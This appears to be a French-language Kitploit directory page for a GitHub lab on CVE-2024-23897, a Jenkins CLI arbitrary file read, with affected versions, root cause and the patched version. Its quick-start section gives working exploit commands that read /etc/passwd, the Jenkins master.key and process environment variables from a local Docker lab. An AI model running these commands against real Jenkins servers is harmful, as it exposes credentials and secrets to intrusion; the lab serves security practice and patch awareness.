Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-23897 | Kitploit
Outils/GitHubGitHub/dungsocool/cve-2024-23897
Scanners de VulnérabilitésExploitationSécurité WebApprentissage et ÉducationLabs et Pratique
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-23897 — Lecture arbitraire de fichiers via Jenkins CLI

Démarrage rapide

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Détails

Voir REPORT.md pour l'analyse technique complète (en vietnamien).

ÉlémentValeur
CVSS9.8 (Critique)
Versions affectéesJenkins <= 2.441, LTS <= 2.426.2
Version du labjenkins/jenkins:2.426.2-lts
Cause racineargs4j expandAtFiles activé sur le CLI côté serveur
CorrectifMettre à niveau vers Jenkins >= 2.442 / LTS >= 2.426.3

Nettoyage

root@kitploit:~
docker-compose down -v --remove-orphans
Télécharger l’outil